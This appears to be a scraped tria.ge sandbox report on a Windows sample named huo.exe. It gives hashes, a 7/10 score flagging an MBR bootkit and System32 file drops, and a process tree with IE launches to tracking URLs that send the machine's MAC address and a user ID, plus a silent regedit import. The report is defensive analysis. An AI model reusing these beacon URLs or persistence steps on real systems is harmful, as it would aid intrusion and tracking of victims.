Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

huo.exe

windows7-x64

7

huo.exe

windows10-2004-x64

7

tj.html

windows7-x64

1

tj.html

windows10-2004-x64

1

Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/02/2024, 08:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    huo.exe

  • Size

    85KB

  • MD5

    abc1a6cedb451694d573a61be7cb0d33

  • SHA1

    a1a1741dcb4a5589ba07bab5931073aeee5275f5

  • SHA256

    a35a56366604e755cca7583f94fc0a851b736beb569615d07fb2ff0c81e48986

  • SHA512

    41d3d98baeaf4931388b9231a79fbc5f284755a9c75d5d91ad2716b3e78e501dc9668d7fe0e9cfc6fcac5d45f869b2f9e75779e748e8719d21aeaadb95bc3133

  • SSDEEP

    1536:xF4mvWAvxyR5UNATpYRGST7/aN0o88FwbWcK4bqTpAj09m:omTxyRPpY4ST7/aNf8PbWcK4buW04

Score
7/10
bootkitpersistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 14 IoCs
  • Modifies Internet Explorer settings 1 TTPs 25 IoCs
    adwarespyware
  • Modifies registry class 14 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\huo.exe
    "C:\Users\Admin\AppData\Local\Temp\huo.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.the9q.com/tong/get.asp?mac=EA08C850D01B&makedate=QM00013&comput=Home&ver=89&userid=0008
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1812 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4868
    • C:\Windows\SysWOW64\hrdsoft.exe
      C:\Windows\system32\hrdsoft.exe C:\Users\Admin\AppData\Local\Temp\huo.exe===
      2⤵
      • Executes dropped EXE
      • Writes to the Master Boot Record (MBR)
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:416
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1692
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
          4⤵
          • Modifies registry class
          • Runs .reg file with regedit
          PID:2316
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.38078.comget.asp?mac=EA08C850D01B&makedate=QM00013&comput=Home&ver=91&userid=0
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:928
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:928 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:4836

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{ECC16708-D614-11EE-BC63-EA08C850D01B}.dat
    Filesize

    5KB

    MD5

    aa35222e055d9fd3069e4e13abd39fe2

    SHA1

    07350a6c3e31f5a136ab936367a1e44bfafa52d4

    SHA256

    a42179bb7ad1ac609ac375b4add52b7b863f8e033f94b3c7025ab1498fa63f38

    SHA512

    570d702a0ee44dda0f44c31ad5157d3e840f92ffa90d90d9e29c6e1ca832a135efbfa8c983ce2c4227bca5ece825efbf73a6f7ecb389a80aa704ef012cda015f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\getback.reg
    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

    Download Submit

  • C:\Windows\SysWOW64\hrdsoft.exe
    Filesize

    16KB

    MD5

    82f1268aa2f982ffc0c90c441e290f5f

    SHA1

    9c31fc2900f909a26107e40a62a358123768fb88

    SHA256

    3524a85048ffdb2c373583799ed2c0e5c5e6d573827356227603a71adf6b5d78

    SHA512

    9c47bb24e8357300ca441e447999b260529dfb0f97093b7baf44f4ccd3776d2e41a1a4d84c27a19183c4af1575cb873b1293547945ca16416ae4f4104cf4d5c5

    Download Submit

  • memory/416-28-0x00000000001C0000-0x00000000001C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/416-26-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/416-40-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/468-0-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

    Download

  • memory/468-1-0x00000000001C0000-0x00000000001C2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/468-39-0x0000000000400000-0x000000000042B000-memory.dmp

    Filesize

    172KB

    Download